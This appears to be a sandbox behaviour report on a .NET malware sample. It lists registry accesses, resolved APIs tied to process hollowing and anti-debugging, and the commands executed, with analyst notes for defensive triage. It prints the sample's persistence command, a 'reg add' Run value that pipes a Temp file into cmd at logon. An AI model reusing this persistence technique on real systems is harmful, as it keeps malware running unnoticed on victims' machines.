HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ncvmxzoureascvnz

Write Keys

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ncvmxzoureascvnz

Delete Keys

Nothing to display

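Mutexes

Note: the mutex below is created by the .NET Framework CLR rather than by the sample's own code (it also appears for unrelated .NET programs), so it is a weak indicator on its own.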

Global\CLR_CASOFF_MUTEX

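Resolved APIs

Note: a resolved API is an address lookup, not proof that the function was called, and much of this list (the mscoree/mscoreei/mscorwks entries and the locale, threadpool and tracing functions) is what the .NET runtime resolves at startup for any managed program. The entries worth triaging are the group commonly associated with process hollowing (CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, GetThreadContext/SetThreadContext, ResumeThread), the debugger-related calls (IsDebuggerPresent, NtQueryInformationProcess, DebugActiveProcess) that match the report's Anti Debug tag, and the token privilege calls (LookupPrivilegeValueW, AdjustTokenPrivileges).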

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.GlobalMemoryStatusEx
bcrypt.dll.BCryptGetFipsAlgorithmMode
kernel32.dll.VirtualProtect
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SwitchToThread
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.DebugActiveProcess
kernel32.dll.WaitForDebugEvent
kernel32.dll.ContinueDebugEvent
kernel32.dll.DeleteFileA
advapi32.dll.SetKernelObjectSecurity
advapi32.dll.GetKernelObjectSecurity
ntdll.dll.NtSetInformationProcess
ntdll.dll.NtProtectVirtualMemory
ntdll.dll.NtQuerySystemInformation
kernel32.dll.GetModuleFileNameW
shfolder.dll.SHGetFolderPathW
kernel32.dll.CopyFileW
kernel32.dll.LocalFree
kernel32.dll.CreatePipe
kernel32.dll.DuplicateHandle
kernel32.dll.GetStdHandle
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.CreateProcessW
kernel32.dll.GetFileType
kernel32.dll.GetConsoleCP
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.GetConsoleOutputCP
kernel32.dll.WriteFile
ole32.dll.CoUninitialize
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister
kernel32.dll.SetThreadUILanguage
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
ntdll.dll.NtQueryInformationProcess
kernel32.dll.GetTempPathW
kernel32.dll.CreateFileW
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.VirtualAllocEx
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.WriteProcessMemory
kernel32.dll.ReadProcessMemory
kernel32.dll.TerminateProcess

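Execute Commands

Note: the `reg add` command creates the Run value listed under Write Keys. At each logon of this user, that value pipes the contents of the Temp file ncvmxzoureascvnz.txt into cmd, so the Run value and that file are both persistence artifacts to collect and remove, alongside the executable launched from the per-user Startup folder.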

"cmd"
"C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe"
reg  add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ncvmxzoureascvnz" /d "cmd /c type "C:\Users\Seven01\AppData\Local\Temp\ncvmxzoureascvnz.txt" | cmd"

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01b_64 Seven01b_64 VirtualBox 2018-03-15 15:10:19 2018-03-15 15:13:09 170

